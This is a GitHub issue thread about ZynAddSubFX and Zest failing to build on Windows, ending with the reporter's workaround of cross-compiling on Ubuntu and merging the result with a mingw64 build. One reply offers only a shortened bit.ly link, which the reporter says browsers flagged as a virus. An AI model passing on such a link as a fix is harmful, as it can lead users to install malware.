### ISSUE TITLE
Windows install; Zest failing (see my comment, not the post.)

### ISSUE THREAD

**Issue by clockFox09** [zynaddsubfx/zyn-fusion-build#121]
![Screenshot 2024-09-02 181815](https://github.com/user-attachments/assets/b6e588d3-8bac-44c3-946a-47524ad2347d)
I've tried both methods of installing for Windows, and neither worked. Every time it failed it would say "address.c:641:18: error: implicit declaration of function 'inet_pton'; did you mean 'inet_ntoa'? [-w implicit-function-declaration]"

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by clockFox09** [comment]
> try this https://bit.ly/4e4zLlq select the desired compiler in the installer

got MULTIPLE warnings from a lot of sources on my BROWSER, it didn't even make it to the download, that this was a virus

**Comment by clockFox09** [comment]
Update: I switched to Ubuntu and ZynAddSubFx finally built, but now zest doesn't. I will not be linking a picture or anything as it SEEMS to be the same problem as in #117

**Comment by clockFox09** [comment]
Closing this as I figured out what to do. It's a little strange but I'll describe the process as best I can.
- (Using Ubuntu) compile ZynAddSubFx for windows (PARALLEL=1 make MODE=release -f Makefile.windows.mk zynaddsubfx)
- On windows, (using mingw64) compile Zest for windows (make MODE=release -f Makefile.mingw64.mk zest)
- You should now have two "zyn-fusion-build" folders, the one on Ubuntu that has ZynAddSubFx, and the one on windows that has Zest, copy the windows folder, and paste it into the Ubuntu folder. Whenever it asks if you want to merge/overwrite specific files that are the same, you should be good to overwrite all, as the majority of the windows files will be the same, just make sure you don't get rid of files that are DIFFERENT, as those will probably be zyn-specific files and zest-specific files.
- Using Ubuntu, enter the folder that has the merged files, and package for windows. (PARALLEL=1 make MODE=release -f Makefile.windows.mk package)(I don't actually remember if I used "PARALLEL=1" here but it worked, whichever I did)
- Move the output zipped and/or unzipped folders to windows.

So yeah, merging the cross-compile and mingw64 methods work. That's interesting.
